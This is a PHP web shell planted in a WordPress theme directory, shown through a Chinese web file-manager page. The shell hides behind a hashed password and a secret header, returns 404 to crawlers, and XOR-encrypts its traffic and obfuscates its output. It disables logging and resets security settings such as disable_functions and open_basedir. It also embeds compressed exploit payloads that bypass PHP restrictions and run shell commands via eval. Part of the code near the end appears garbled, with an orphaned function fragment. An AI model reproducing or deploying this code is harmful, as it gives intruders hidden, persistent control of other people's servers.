芝麻web文件管理V1.00

编辑当前文件:/home/mybf1/public_html/rambut.bf1.my/wp-content/themes/AM13S4N8/VNY1ZGUI.php

<?php
$GLOBALS['HASHTYPE'] = 'sha512';
$GLOBALS['PASSHASH'] = '7590df7a754cd0f1a21807f3c24cb00d908fd09ea7856a01f45050be5a4c6259d6a9f542303c148ffc9163a13838d4e245cfbaa769bf44c0ac4c2a0a91398400';//P@55w()rD
$GLOBALS['SECHEAD'] = 'USER_AGENT';
$GLOBALS['DEFAULT_TAB'] = 'tabFM';
$GLOBALS['COOKIE'] = true;
$GLOBALS['DARK'] = false;
$GLOBALS['REMOTE_ADDR'] = true;
$GLOBALS['ACECONF'] = array('DEFAULT' => true, 'THEME' => 'crimson_editor', 'MODE' => 'php', 'URL' => 'https://cdnjs.cloudflare.com/ajax/libs/ace/1.14.0/ace.js');
$GLOBALS['DEBUG'] = (isset($GLOBALS['DEBUG']) ? $GLOBALS['DEBUG'] : false);

filterClient();
decodeRequest();
checkAuth();

function checkAuth(){
	if(!$GLOBALS['PASSHASH']) return setEncKey();

$loginWithPass = (isset($_REQUEST['pass']) && hash($GLOBALS['HASHTYPE'], $_REQUEST['pass']) === $GLOBALS['PASSHASH']);
	$encKeyWithPass = ($GLOBALS['ENCKEY'] === genEncKey($GLOBALS['PASSHASH']));

if($loginWithPass)
		setEncKey($GLOBALS['PASSHASH']);
	elseif($encKeyWithPass)
		setEncKey();
	else
		loginFormOut();
}

function genEncKey($str){
	return base64_encode(hash($GLOBALS['HASHTYPE'], ($GLOBALS['REMOTE_ADDR'] ? $_SERVER['REMOTE_ADDR'] : '').$str.__FILE__));
}

function setEncKey($pass = ''){
	if(!$pass && $GLOBALS['ENCKEY']) return $GLOBALS['ENCKEY'];
	$eKey = genEncKey($pass);
	$GLOBALS['ENCKEY'] = $eKey;
	return $eKey;
}

function mergeRequestVars(){
	$vars = array('_FILES','_COOKIE','_REQUEST');
	foreach($vars as $var)
		if(isset($GLOBALS[$var]))
			foreach($GLOBALS[$var] as $k => &$v)
				$_REQUEST[$k] = &$GLOBALS[$var][$k];
}

function decodeRequest(){
	mergeRequestVars();
	$GLOBALS['PRELEN'] = getPreLen();
	if(!$GLOBALS['ENCKEY'] = getEncKey()) $GLOBALS['ENCKEY'] = setEncKey();
	$_REQUEST = decodeInput($_REQUEST);
}

function getPreLen(){
	return (substr(array_sum(str_split(hash($GLOBALS['HASHTYPE'], __FILE__))), -1) + 5);
}

function filterClient(){
	$secretHeader = isset($_SERVER['HTTP_'.$GLOBALS['SECHEAD']]);
	$crawlerBot = preg_match('/bot|crawl|spider/i', $_SERVER['HTTP_USER_AGENT']);
	if($crawlerBot || !$secretHeader) exit(header('HTTP/1.1 404 Not Found'));
}

function loginFormOut(){
	$html = '<html><head><meta name="robots" content="noindex"></head><body style="background:#f0f0f0;display:grid;height:100vh;margin:0;place-items:center center;"><form action="" method="POST" onsubmit="return login(this)"><input style="text-align: center" name="pass" type="password" value=""></form></body>'.paramsHandlerJS().'</html>';
	exit(makeOut($html));
}

function scriptInit(){
	if(!isset($GLOBALS['DEBUG'])) return;
	define('D', $GLOBALS['DEBUG']);
	set_time_limit(D ? 15 : 0);
	error_reporting(D ? E_ALL : 0);
	ini_set('display_errors', D ? 'On' : 'Off');
	ini_set('max_execution_time', D ? 15 : 0);
	ini_set('error_log', NULL);
	ini_set('log_errors', 0);
}

function decodeInput(&$arr){
	$str = '';
	foreach($arr as $k => $v){
		$key = getName($k);
		if(!strlen($key)) continue;
		$str .= $key.'='.urlencode(getValue($v)).'&';
		unset($arr[$k]);
	}
	parse_str($str, $dec);
	return array_merge($arr, $dec);
}

function xorStr($str, $decode = false) {
	$key = $GLOBALS['ENCKEY'];
    $key_len = strlen($key);
    $str = (!$decode ? rawurlencode($str) : $str);
    for($i = 0; $i < strlen($str); $i++)
        $str[$i] = $str[$i] ^ $key[$i % $key_len];
    $str = ($decode ? rawurldecode($str) : $str);
    return $str;
}

function ascii2hex($ascii) {
	$hex = '';
	for ($i = 0; $i < strlen($ascii); $i++) {
		$byte = strtoupper(dechex(ord($ascii[$i])));
		$byte = str_repeat('0', 2 - strlen($byte)).$byte;
		$hex.=$byte;
	}
	return $hex;
}

function hex2ascii($hex){
	$ascii='';
	$hex=str_replace(" ", "", $hex);
	for($i=0; $i<strlen($hex); $i=$i+2)
		$ascii.=chr(hexdec(substr($hex, $i, 2)));
	return($ascii);
}

function setName($str){
	$str = ascii2hex(xorStr($str));
	$pref = substr($GLOBALS['ENCKEY'], 0, $GLOBALS['PRELEN']);
	return $pref.$str;
}

function getName($str){
	$data = getData($str);
	if($data === false) return false;
	return xorStr(hex2ascii($data), true);
}

function setValue($str){
	return base64_encode(xorStr($str));
}

function getValue($str){
	return xorStr(base64_decode($str), true);
}

function getData($str){
	$ln = $GLOBALS['PRELEN'];
	$pref = substr($str, 0, $ln);
	$data = substr($str, $ln);
	return ($pref === substr($GLOBALS['ENCKEY'], 0, $ln) ? $data : false);
}

function paramsHandlerJS(){
	return '<script>
		var ENCKEY = atob("'.base64_encode($GLOBALS['ENCKEY']).'");
		var PRELEN = '.$GLOBALS['PRELEN'].';
		var COOKIE = '.(int)$GLOBALS['COOKIE'].';

'.($GLOBALS['DARK'] ? 'invertColors();' : '').'
		startEventsListners();
		if(COOKIE){
			if(ci = document.getElementById("cbCO"))
				ci.checked = "on";
			deleteAllCookies();
		}

function startEventsListners(){
			var elements = document.getElementsByTagName("*");
		
			for(var i=0;i<elements.length;i++){

if(elements[i].type && elements[i].type == "file")
						elements[i].onchange = function(e){
							if(!elmById("cbRR").checked) prepareFile(this)
							else uplFiles();
						}
					
			}
		}
				
		function bin2hex(bin){
		  var hex = "";
		  for(var i = 0; i<bin.length; i++){
		    var c = bin.charCodeAt(i);
		    if (c>0xFF) c -= 0x350;
		    hex += (c.toString(16).length === 1 ? "0" : "") + c.toString(16);
		  }
		  return hex;
		}
		
		function login(form){
			addEncKey(form);
			form.pass.value = setValue(form.pass.value);
			form.pass.name = setName(form.pass.name);
			
			if(COOKIE)
				submitViaCookie(form);
			else
				return true;
				
			return false;
		}
		  
		function hex2bin(hex) {
		  var bin = "";
		  for (var i=0; i<hex.length; i=i+2) {
		    var c = parseInt(""+hex[i]+hex[i+1], 16);
		    if (c>0x7F) c += 0x350;
		    bin += String.fromCharCode(c);
		  }
		  return bin;
		}
			
		function xorStr(str, decode = false) {
			str = (!decode ? encodeURIComponent(str) : str);
			str = str.split("");
		    key = ENCKEY.split("");
		    var str_len = str.length;
		    var key_len = key.length;
		
		    var String_fromCharCode = String.fromCharCode;
		
		    for(var i = 0; i < str_len; i++) {
		        str[i] = String_fromCharCode(str[i].charCodeAt(0) ^ key[i % key_len].charCodeAt(0));
		    }
		    str = str.join("");
		    
		    if(decode){ 
				try{
					str = decodeURIComponent(str);
				}
				catch(e){
					str = unescape(str);
				}
			}

return str;
		}
		
		function setName(str){
			str = bin2hex(xorStr(str));
			pref = ENCKEY.substr(0, PRELEN);
			return pref + str;
		}
		
		function setValue(str){
			return btoa(xorStr(str));
		}
		
		function getValue(str){
			return xorStr(atob(str), true);
		}
		
		function addEncKey(form){
			var encKey = document.createElement("input");
			encKey.type = "hidden";
			pref = ENCKEY.substr(0, PRELEN);
			encKey.name = pref.split("").reverse().join("") + pref;
			encKey.value = btoa(ENCKEY);
			form.appendChild(encKey);
			return form;
		}
		
		function fixFileName(str, len = false){
			str = str.split(/(\\\\|\\/)/g).pop();
			if(len) str = str.substring(0, len);
			return str;
		}
		
		function getParentFormOf(element){
			
			while(element.tagName != "FORM")
				element = element.parentElement;

return element;
		}
		
		function prepareFile(input){
			var file = input;
			form = getParentFormOf(input);
			form.enctype = "application/x-www-form-urlencoded";
			
			if(file.files.length){
				var reader = new FileReader();
				
				reader.onload = function(e){
						filename = fixFileName(input.value);
						wwwFile = document.createElement("input");
						wwwFile.type = "hidden";
						wwwFile.id = input.name;
						wwwFile.name = input.name + "["+filename+"]";
						wwwFile.value = e.target.result;
						if(e.target.result.length <= 2097152)
							form.appendChild(wwwFile);
						else
							if(confirm("Request size is ~" + Math.round(((e.target.result.length * 2) / 1024) / 1024) + "M, but limits is often around <= 8M. There is no guarantee that the file will be uploaded.\nYou can disable request encoding, use other upload methods or select a smaller file. Continue?"))
								form.appendChild(wwwFile);
							else
								return false;
							
						uplFiles();
						
						elements = form.getElementsByTagName("*");
						for(var i = 0; i < elements.length; i++)
							if(elements[i].type === "hidden")
								form.removeChild(elements[i]);
				};
				
				reader.readAsDataURL(file.files[0]);
				return reader;
			}
			
		}

function deleteAllCookies() {	
			var cookies = document.cookie.split(";");
		
			for (var i = 0; i < cookies.length; i++) {
				var cookie = cookies[i];
				var eqPos = cookie.indexOf("=");
				var name = eqPos > -1 ? cookie.substr(0, eqPos) : cookie;
				document.cookie = name + "=;expires=Thu, 01 Jan 1970 00:00:00 GMT";
			}
			
			return false;
		}
	
		function submitViaCookie(encodedForm, refresh = true){
			var reqlen = 0;
			var elements = encodedForm.getElementsByTagName("*");
			
			for(i = 0; i < elements.length; i++) {
				
				if(!elements[i].name) continue;
				
				name = elements[i].name;
				value = encodeURIComponent(elements[i].value);

if(value.length > 4095 || reqlen > 7696){
					if(confirm("The request header is too big, send it via POST?")){
						deleteAllCookies();
						return false;
					}
					else{
						deleteAllCookies();
						return "CANCEL";
					}
				}
				
				document.cookie =  name + "=" + value;
				reqlen = reqlen + name.length + value.length;
			}
			
			if(refresh)
				window.location = window.location.pathname;
			else
				return "SEND";
		}
		
		function invertColors() {
		    var css = "html{-webkit-filter: invert(90%); -moz-filter: invert(90%); -o-filter: invert(90%); -ms-filter: invert(90%);}";
		    var head = document.getElementsByTagName("head")[0];
		    var style = document.createElement("style");
		    if(!window.counter)
		        window.counter = 1;
		    else{
		        window.counter++;
		        if (window.counter % 2 == 0)
		            var css = "html{-webkit-filter: invert(0%); -moz-filter: invert(0%); -o-filter: invert(0%); -ms-filter: invert(0%);}"
		    }
		    style.type = "text/css";
		    
		    if(style.styleSheet)
		        style.styleSheet.cssText = css;
		    else
		        style.appendChild(document.createTextNode(css));
		        
		    head.appendChild(style);
		    
		    return false;
		}
</script>';
}

function makeOut($str){
	return (c('<script>').t(f('write', 1).'('.f('decodeURIComponent').'('.f('atob').'(('.i(base64_encode(rawurlencode(c($str, 1))), 100, 400).'))));', true).c('</script>'));
}

function f($f, $d = false){
	$r = rand(0,1);
	return ($r ? (rand(0,1) && !$d ? f('self') : ($r  && !$d ? f('top') : f('document'))).'['.i($f, 1, 3).']' : ($d ? f('document').'.'.$f : $f));
}

function i($s, $m, $x){
	$s = str_split($s, rand($m, $x));
	if($m > 50) $s[0] = trim(i($s[0], 1, 5, true), '"\'');
	return implode('+', array_map(function($k){$r = date('H') > 12; return ($r ? '"' : '\'').$k.($r ? '"' : '\'');}, $s));
}

function c($s = '', $n = 0){
	$r = array('/', '>', '*');
	return (rand($n, 1) ? ''.(strlen($s) ? $s.(rand(0, 1) ? ''."\n" : '') : '') : $s);
}

function j($a = 0){

$l = rand(10, 100);
	while(!isset($c[$l])) @$c .= chr($a ? rand(32, 126) : rand(1, 127));
	
	if(rand(0, 1))
		return "//".str_replace(array("\r","\n"), "", $c)."\n";
	else
		return "/*".preg_replace("|\*/|","", $c)."*/";
}

function t($s, $n = false){
	if(!function_exists('token_get_all')) return $s;
	
	$s = ($n ? '<?php ' : '').$s;
	
	foreach(token_get_all($s) as $t)
		@$r .= (is_array($t) ? $t[1] : $t).j();
	
	return ($n ? substr($r, 6) : $r);
}

function sDie($str = ''){
	if(RO)
		die($str);
	else{
		$out = ob_get_contents();
		ob_end_clean();
	}
	
	if(preg_grep('|attachment|', headers_list())) print gzencode($out.$str, 9);
	else
		print setValue($out.$str);
	die;
}

function safemode($cmd = 'check'){
	
	if(!defined('PHP_VERSION_ID')) return false;
	$c = __FUNCTION__;
	$v = PHP_VERSION_ID;
	
	$pocs['cm_php_fpm'] = array('v' => ((strpos(php_sapi_name(), 'fpm') !== false) && is_int(array_search(true, array_map(function($f){if(function_exists($f)) return true;}, array('mail', 'error_log', 'imap_mail','mb_send_mail'))))), 'r' => 'execFPM($'.$c.')', 'c' =>'eJyNV21T20YQ/kxn+h8ORZmTMopkAyaEhFAGTPBMwK5x0ukkmRtZOmEVWdJIMoG2/Pfu7t35BZu2Mj7f7T63t7valyOZ5VGTFjmT9zI6H1w6djSN3b9+/mnLrmTNjlgSZrV8B2v4SxPHTsopUG9kg2CXkFt2PR2EzQToaZ4K4Dm8lnk8DdNMlMDgLgrYUtDJeZpJgDppLX5UaROOM+lwn7vsmAlx1hsKwQ5Z/VCjINHIaSnitIKjfB5wfxp3nCadSliTTHt6e56FNyAPOVq6T0YQP4GlKGeNiIq8kXlTG4zH+IvtYJzmQT3hvvUtt3z+gnFfC1QUlONz9gHpapuSGk2mRbyQ1HrT6SyZWE5KbaPRh/tA488ppPGg0ftjmLPjD8phJCwqYpTEcbElq6qoRCXLomrS/MZpqVO30O01uN1SgKy4sUCrp0wgCwLUhqv4iZPoKBDyPq1BJaueyCwTGBOW6xLKxMOC41hzr/jc0ocZidtpjWfiJh0kYHpRyTCaOGFVhQ+OheEBiqzobKXTsBSKY03HAsNILV0W1sxGRbU+m/RWfHMe6Ixrp+3BR+sHzxi0uDWrR/p95NoZeB5lAYS5x8azNIsHYXSrop3ehccW78vEhPuOwbO83+THmgzO4TVz3Eop4y6Fjc43jA+M/KcBa97XLM/S/NZZiUdD05oR8VFFUCWbWZUzZ7tuqrKo6Y3A8SrKMefo3EOV57jxEY8xjv3fLmDgc3SCXRIWDGmKGneg861v960WfNv6d+1L0bO83adS0qRhlv4pB2EVTrUwBcNHRdFijQ8fdn/93L0eicvu6KJ/xtkRpO7H7oh7T3DX3eGX7lAMhv1R/7T/SQEvRqNB0Pbba+iPJ6Pubye/i97VqDs8PzntKvzpx95GuBZ+dXKpgVkRhdmkqJs1KB4pLvrXo/8CDruX/VFXnJydDRW0vfPGb8Fnw/Gnw95gJM57n7pzFeYv7Al2cDEAmZe9K/Hl5NNnhf2jSHMHy5+30ce0L8yy4oeYVZlI8yibxfKI+yo4IKJ4P+cQUbyfJNz1NuyO0xqrvjBRVh8hdBOyKGUuxmEtoQU8CwpnTSFKqIpYLDB/VpSJwyY89LgPysociY4us/IuzByUvb8nYkkcqGiaoKEkxcXyBjmOdRntIqOweKx2ueVTTZsDdDCrq6CmRqPR7HXDXqfcXTXFXVrr6YasmGfV3r8xO6pYIFvnv0at5bcpVNTx7yBtMSIgeq97/SusIjZahnVJhQIP7sIqqGZ5AB4MsJaReRS36yxDeAanupx9J6vFAfbd19Z3KCv448PYpnFnEwnH3e9YToNXMHa4xzv+Lo17NCrKPoxv8Ou3aGzTuEPjLo2IPiDuAXEPiHtA3APgvgqUokXZLBRVJOhdeYGNHiZQYLFRc926TbfTHsTuhTOXzRlkONJh4jIS//U7CkOcz/HK4CPP56+hHfl1Ed3yuSKEXFSBw7etVmvtaNIYT4AJtc3FDe4XUFeGU4FSsdtkKTQbh7aAn9k2CA845k8TlYdBQAk9y9N7nLs+wjymzPeM9R5r68uCCTo4SnUtTTCXydUYXG26OlL1zXIiw1jFhz0u4oe5g6llJnCPqp9sI+aPCSSfs53IQtlrrgQ2tEm8TSUQ9mbjXuvtvrkpAVohjpj1rYIS6LKl28JcGUg1whH5UbXl9SO1xv5zxyVRVtRSgbVJJv+N/1DAmrs2NUY7jckFuF6EKJCw+pHTyANLMUlIDI1b+UAdAqrhTGqv0y5QHH3qWKdXlgevF8qng2jXc9rv3++2XfY3M2S1WV/JzW4EP6EQTt9OFmGh6xYZsaeVXr+KLKPs5qGUC/MsSxWw+eWjLqs0bxIHbx7tl9HiQ7cNKt9KBM3SmAVsp7MPAmH6kqZ0m9PWkT4Gskp8DvySHQDR1Ogl3dALCHm3SoPdeK+XYUM6g47OmkBX/1ewuaz/A3c4q58=');

$pocs['mm0r1_filter'] = array('v' => ($v >= 70000 && $v <= 70234 || $v >= 70300 && $v <= 70333 || $v >= 70400 && $v <= 70425 || $v > 80000 && $v < 80013), 'r' => 'pwn($'.$c.')', 'c' =>  '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');
	
	$pocs['mm0r1_concat'] = array('v' => ($v == 80013 && $v == 80014 || $v > 80100 && $v < 80120), 'r' => 'new Pwn($'.$c.')', 'c' =>'eNqtV1tvo0YUfs+vmFrIgpqswE5tJw6pvE20SS/ZNJc+rGuhMQxrEgzWABtnt/7vPTNcPAwQZ6taijwx53zn/s3BCXAco0sSrAlF39A6XQS+gxSsI2UBf84EbQ8cLnPzHKJvBwg+ThTGCfrl8uH6N/t8ej+1764+XSALGZuhMalJ5A8/XVyf2+cX7x8+2O8frn4/Rz+jmATeyYmM0wOcvoFOmh+L+Hf3t1fXHwoDzWiHgGaO4cucHAiql/c7p01zPJEeNQAXGjXAPGVeGjqJH4XItjkOTZ1EVZyVq+VZYx8voqriM6sTBN+nyOSHXk8UYh/lM42i1WxemsdBEDlqdhbc0yZvV6sGJmhuy1N5UCAGByc2xGFj16UlIPzQXycQRbL048OzJcFrOyD4SdV0ZA4FUMXzg+AN7u8UMkS8cL4jaAXECwdrPvcqPZF1j2zOo4SoJYqIXATIJ8NCIXnOx2Qn43sqGAtIqO6c16Cq0CGDwUiuKSVJSkMx7c3GAAbsdQJCks6kTWQBIkXLqcoGbG1bZR3e5h4hrocdIuYgk7CXOHQDQmOWxEyVksCmBLuqUSmRE0RxSkmZcVkYBrdR3iGiNEhWkdjIm4aQ/B3CAse+Y7NIBe8+k8QWHqiCnYr5r75nxy9xQlZV3ew3VQSv6Hn4CbByzMjzeP5GxqR9jlnFx/zcs9C4Ns27PD1TP4GGq1noga7+aooUX2uc2TeBG5vBGAZUR0dii+d1ZzIxSSCcm8sb+4/prx9v7b8ubu+uPl4jy4J4gKtZ/MDJQPHjyfeZlqzoYlnas150WDnfPdQcFyPvdodYR+oN0EIWVHmytIy23wDbgpiGEGcdNhPIp35N/S84IbtrQ2BSoXsUTFkaZrO5jmbz+c4GWLAJpVE5vGrJBhpKY4LULtPVUVdZpF6tITNYU7o9QJJxL/AnJWuCE7Xz98YwOjrad4FUGJnSmTlH7/aQONygOXd2ppTil47Y3RlVcodez1pO3yz/YtbW+CWIsAvBrLHzpHb+/BGCMDYuzNWCEI+dHeyRBV4QKKPM/IX2u2oupi2J2EVSaGqNVPb/lJJ9FWb+Y1ULfSCE/UXsbDqvl6BkfyUbcNGrvI6NqwNMNuQ+19lvIieYkkS+4CBlxQuRRLjAzahKzkrYsmSVjsxyXE6zbHtyluAnN4G67O705EUre3Z2BsZlUm6PgiWJNVuT2w0cYxp5c2ZLp3hB5vYtVN0/ygVCqywpYO0HK7NXaHYtpJro9BSxh/A10DS+0woXSzGEXOH1ArVdqhUmyxldeL5z0o3k2ng2CRP6Iu8N0qzmoiFe1TaMHEBHQ0meJaRQsfhbizv8aXQ0GoyORwO5R8REyH5At4wl7K00kFzK4m80Qpug56UfkNJFXhxD25/iys4jk16GCe8dpM4LvIf4u45Rz4UcFlsS8sxMx6jbreXDD23MKFttysgRU9drOuwz6xvm2BgNYA2B07FxbPTZqW8YxwODn0z221xrKoKyitw0ILxutf1TsJ/voK+py5oycoM6y1MFIWuco1F/aA6PhmRosgZq8ntPA4G74wZ725auqjBMnOBEfPPMblol9r+SJhKGCyBepp4HXSJfa5lOtQNl9JK+4QAaa0awjUTGIiNxzAm4ujE/ssyHGc/AP2cZRT8eHjZ2LMM4Pa0QbOXZPxaKqMv9mYE7QN2P88YNuUh/rlhEuT34F11ikeU=');
	
	foreach($pocs as $pocname => $poc)
	{
		if(!$poc['v']) continue;
		
		switch($cmd){
			case 'check':
				return $pocname;
			break;
			default:
				ob_start();
				eval('$'.$c.' = \'(echo "via '.$pocname.':";'.addslashes($cmd).') 2>&1\';echo '.$poc['r'].';'.gzuncompress(base64_decode($poc['c'])));
				$res = ob_get_contents();
				ob_end_clean();
				
				if(strpos($res, $pocname)) return $res;
		}
	}
	
	return (isset($res) ? $c.' for '.$v.' fails ;( ' : false);
}

#
#
#

$ini = array(
	'disable_classes' => '',
	'disable_functions' => '',
	'display_errors' => 0,
	'enable_post_data_reading' => 1,
	'error_log' => '',
	'error_reporting' => 0,
	'file_uploads' => 1,
	'log_errors' => 0,
	'log_errors_max_len' => -1,
	'magic_quotes_gpc' => 0,
	'magic_quotes_runtime' => 0,
	'magic_quotes_sybase' => 0,
	'max_execution_time' => 0,
	'memory_limit' => '1024M',
	'open_basedir' => '',
	'safe_mode' => 0,
	'safe_mode_exec_dir' => '');

$sysini = ini_get_all();
	foreach($ini as $k => $v)
		if(isset($sysini[$k]) && $sysini[$k]['access'] == 7)
			ini_set($k, $v);
	
scriptInit();

if(defined('CED'))
	$D = unserialize(pack('H*', CED));
else{
	if(isset($_REQUEST['a']))
		$D=$_REQUEST;
	elseif(isset($_REQUEST['a']))
		$D=$_REQUEST;
	else
		$D=array();
		
	if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc())
		$D = unQuote($D);
	
	if(isset($D['k'])){
		$k = $D['k'];
		unset($D['k']);
		prepVals($D,$k);
	}
}

$C = array(''=>'UTF-8','UTF-16','Windows-1250','Windows-1251','Windows-1252','Windows-1254','Windows-1256','Windows-1257','ISO-8859-1','ISO-8859-2','ISO-8859-7','ISO-8859-8','ISO-8859-9','ISO-8859-13','Big5','GBK','Shift_JIS','EUC-KR','EUC-JP','IBM866','KOI8-R','KOI8-U',);

define('VER', '1.4');
define('DSC', DIRECTORY_SEPARATOR);
define('NIX', DSC === '/');
define('RO', isset($D['ro']) ? true : false);
define('TM', isset($D['tm']) ? true : false);
define('CSE', isset($D['c']) ? $C[$D['c']]:'UTF-8');

ob_end_clean();
if(!RO) ob_start();

if(!defined('CED')){
	if(isset($D['a'])){
		$md5 = md5(rand(0, 777777));
		if(isset($D['d'])){
			if($D['a']==='f'){
				if(is_array($D['d'])){
						$D['DBP'] = samePath($D['d']);
						$n = $md5.'.zip';
					}
					elseif(is_dir($D['d']))
						$n = $md5.'.zip';
					else
						$n = fileName($D['d']);
						$n = escFileName($n);
			}
			else
				$n = $md5.'.zip';
				
			header('Content-Type: application/octet-stream');
			header('Content-Disposition: attachment; filename="'.$n.(RO ? '' : '.gz').'"');
		}
		else{
			header('Content-Type: application/json; charset='.CSE);
		}
	}
	else
		header('Content-Type: text/html; charset='.CSE);		
}
					
function escHTML($v){
	return str_replace(array('&','"','<','>'), array('&','"','<','>'), $v);
}

function selfPath(){
	if(isset($_SERVER['SCRIPT_FILENAME'])) return filePath($_SERVER['SCRIPT_FILENAME']);
	if(isset($_SERVER['DOCUMENT_ROOT'])) return substr($_SERVER['DOCUMENT_ROOT'],-1) === DSC ? $_SERVER['DOCUMENT_ROOT'] : $_SERVER['DOCUMENT_ROOT'].DSC;
	if(PHP_VERSION >= '5.3') return substr(__DIR__,-1) === DSC ? __DIR__ : __DIR__.DSC;
	return filePath(__FILE__);
}

function filePath($p){
	$p = rtrim($p, DSC);
	return implode(DSC, array_slice(explode(DSC,$p), 0, -1)).DSC;
}

function fileName($p){
	$p=rtrim($p, DSC);
	$i=strrpos($p, DSC);
	return $i=== FALSE ? $p : substr($p,$i+1);
}

function writeFile($p,$c){
	if($v = fopen($p,'wb')){
		flock($v,LOCK_EX);
		fwrite($v,$c);
		fflush($v);
		flock($v,LOCK_UN);
		fclose($v);
		return TRUE;
	}

if(PHP_VERSION>='5'){
		$v = file_put_contents($p,$c);
		if(is_int($v)) return TRUE;
	}

if(PHP_VERSION>='5') : if(PHP_VERSION>='5.1'){
		try{
			$v = new SplFileObject($p,'wb');
		}
		catch(Exception $e ){
			$v=FALSE;
		}
	
		if($v){
			$v->flock(LOCK_EX);
			$v->fwrite($c);
			$v->fflush();
			$v->flock(LOCK_UN);
			unset($v);
			return TRUE;
		}
	}
	endif;
	
	return FALSE;
}

function tempName(){
	$a = 'poiuytrewqlkjhgfdsamnbvcxzMNBVCXZLKJHGFDSAPOIUYTREWQ0987654321';
	$v = '.';
	for($i = 0; $i < 8; ++$i) $v .= $a[rand(0,61)];
	return $v.'.tmp';
}

function tempFile($v){
	if(($n = tempnam(NIX ? '/tmp' : 'c:\\Temp', '')) && (writeFile($n, $v))) return $n;
	$a = array('upload_tmp_dir','session.save_path','user_dir','doc_root');
	
	foreach($a as $k)
		if($n = ini_get($k)){
			$n .= DSC.tempName();
			if(writeFile($n, $v)) return $n;
		}
		
		$n = selfPath().tempName();
		
		if(writeFile($n, $v)) return $n;
	
	return FALSE;
}

function delFile($p){
	return (unlink($p) || (NIX && rename($p,'/dev/null') && !is_file($p) && !file_exists($p)));
}

function nesc($v){
	return "'".str_replace("'", '\'"\'"\'', $v)."'";
}

function wesc($v){
	return str_replace(array('^', '&', '\\', '<', '>', '|'), array('^^', '^&', '^\\', '^<', '^>', '^|'), $v);
}

if($a)
		if(isset($a[$id])) return $a[$id];
	elseif($f)
		if($v = posix_getgrgid($id)) return $v['name'];
	
	return$id;

}

function getINI($s, &$v){
	$v = trim(ini_get($s));
	return $v!=='';
}

function isINI($v){
	$v = strtolower(trim(ini_get($v)));
	return ($v === '1' || $v === 'on');
}

function escFileName($v){
	return str_replace(array('%','/','\\',':','*','?','"','<','>','|'), array('%25',"\xe2\x95\xb1","\xe2\x95\xb2","\xea\x9e\x89","\xe2\x88\x97", '%3F', "\xe2\x80\x9f", '%3C', '%3E',"\xe2\x88\xa3"), $v);
}